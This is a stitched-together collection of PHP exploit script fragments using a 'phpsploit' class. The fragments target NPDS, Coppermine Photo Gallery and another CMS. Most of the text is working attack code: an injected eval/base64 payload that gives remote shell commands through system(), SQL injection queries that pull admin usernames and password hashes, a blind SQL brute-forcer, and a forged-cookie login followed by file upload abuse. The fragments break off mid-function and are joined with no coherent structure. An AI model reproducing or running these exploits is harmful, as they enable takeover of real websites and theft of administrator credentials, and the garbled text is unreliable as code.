function main() { // :) $web = new phpsploit(); $web->agent('Mozilla Firefox'); // Hey ya :) head(); // Target $url = get_p('url', true); // Proxy options $prh = get_p('proxhost'); $pra = get_p('proxauth'); // Use a proxy ? if ($prh) { // host:ip $web->proxy($prh); // Authentication if ($pra) { $web->proxyauth($pra); } } // Single quote bypass $byp = "1');"; // PHP code $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));'; // Separator $s_sep = md5(rand(0, 1000000000) . 'HEY_YA'); $c_sep = "print('{$s_sep}');"; // Final PHP code $final = $byp . $c_sep . $php . $c_sep . 'exit();//'; // Welcome guess ! while (($cmd = cmd_prompt()) !== false) { // magic_quotes_gpc bypass $web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");')); // Go =] $web->get($url . 'index.php?fields=' . to_char($final) . ',1'); // Result $res = explode($s_sep, $web->getcontent()); // Erf if (!isset($res[1])) { print "\nFailed"; exit(1); } else { if (empty($res[1])) { print "\nNo output: system() disabled OR cmd failed OR cmd without output"; } else { print "\n" . $res[1]; } } } return; }
error_reporting(E_ALL ^ E_NOTICE); # Advisory soon if ($argc < 3) { print "\n TITLE | Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution 0day\n AUTHOR | DarkFig \\/ http://www.acid-root.new.fr \\/ gmdarkfig@gmail.com\n NOTE | Works regardless of php settings\n USAGE | {$argv['0']} -url <url> [Options]\nOPTIONS | -proxy If you wanna use a proxy <proxyhost:proxyport> \n | -proxyauth Basic authentification <proxyuser:proxypwd>\n"; exit(1); } $url = getparam('url', 1); $pro = getparam('proxy'); $pra = getparam('proyauth'); $xpl = new phpsploit(); $xpl->agent('Mozilla Firefox'); if ($pro) { $xpl->proxy($pro); } if ($pra) { $xpl->proxyauth($pra); } # +print.php (SQL INJECTION) # | # 124. } elseif (!empty($lid)) { # 125. settype ($lid, "integer"); # 126. PrintPage("links",$DB, $lid); # # 30. if ($oper=="links") { # 31. $result=mysql_query("select url, title, description, date from ".$DB."links_links where lid='$sid'"); # 32. list($url, $title, $description, $time)=mysql_fetch_row($result); # 40. if ($DB) { # 41. $remp=meta_lang(aff_code(aff_langue(ob_get_contents()))); # $aid = 'CONCAT(CHAR(66,69,71,73,78,85,83,82),(SELECT%20aid%20FROM%20authors%20WHERE%20radminsuper=1),CHAR(69,78,68,85,83,82))'; $pwd = 'CONCAT(CHAR(66,69,71,73,78,80,87,68),(SELECT%20pwd%20FROM%20authors%20WHERE%20radminsuper=1),CHAR(69,78,68,80,87,68))';
} $url = getparam("url", 1); $tblprfix = getparam("prefix") != "" ? getparam("prefix") : 'nuke'; $debug = getparam("debug") != "" ? 1 : 0; $benchmark = getparam("benchmark") != "" ? getparam("benchmark") : '100000000'; $proxy = getparam("proxy"); $proxyauth = getparam("proxyauth"); $xpl = new phpsploit(); $xpl->agent('Mozilla Firefox'); $xpl->allowredirection(0); $xpl->cookiejar(0); if ($proxy) { $xpl->proxy($proxy); } if ($proxyauth) { $xpl->proxyauth($proxyauth); } if ($debug) { debug(1); } print "\nUsername: "******"\nPassword: "; bruteforce('pwd'); exit(0); function bruteforce($field) { global $url, $xpl, $tblprfix, $truetime, $debug, $benchmark, $sql, $bef, $aft, $fak, $b, $c, $f, $dfield, $a, $result; $a = 0; $v = ''; $dfield = $field;
exit(1); } $url = getparam('url', 1); $file = getparam('file', 1); $prfix = getparam('prefix') != '' ? getparam('prefix') : 'webs'; $match_upload = getparam('upmatch') != '' ? getparam('upmatch') : '\\;URL\\=index\\.php\\?site\\=files\\&file\\='; $match_blindsql = getparam('sqlmatch') != '' ? getparam('sqlmatch') : 'site\\=profile\\&id\\='; $proxy = getparam('proxy'); $authp = getparam('proxyauth'); $xpl = new phpsploit(); $xpl->agent("Mozilla Firefox"); if ($proxy) { $xpl->proxy($proxy); } if ($authp) { $xpl->proxyauth($authp); } print "\nAdmin id: "; $userid = blind('userID'); print "\nAdmin hash: "; $passwd = strtolower(blind('password')); print "\nLogged in (ws_auth={$userid}%3A{$passwd})"; $xpl->addcookie("ws_auth", $userid . "%3A" . $passwd); # File upload vulnerability # # +files.php # | # 42. $action = $_GET['action']; # 43. if($action=="save") { # 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no access!", "3")); # 46. $upfile = $_FILES[upfile];
$pxs = $argv[4]; $pxa = $argv[5]; $xpl = new phpsploit(); $xpl->agent("InternetExploiter"); $xpl->cookiejar(1); $xpl->allowredirection(1); print "\nheader> ==============================================="; print "\nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)"; print "\nheader> ==============================================="; if (!empty($pxs)) { print "\nstatus> Using a proxy {$pxs}"; $xpl->proxy($pxs); } if (!empty($pxa)) { print "\nstatus> Basic proxy authentification {$pxa}"; $xpl->proxyauth($pxa); } /*/ Table prefix. /*/ print "\nstatus> Searching the version"; $xpl->get($url . 'include/index.html'); if (preg_match("#Coppermine version: ([0-9]*\\.[0-9]*\\.[0-9]*)#", $xpl->getcontent(), $matches)) { print "\nsploit> Coppermine version " . $matches[1]; } else { print "\nsploit> Not found"; } $table = !empty($matches[1]) ? 'cpg' . str_replace('.', '', $matches[1]) . '_users' : 'cpg1410_users'; /*/ If you have the admin cookie (but not the password), replace lines 73=>76 by $xpl->addcookie('yourcookie');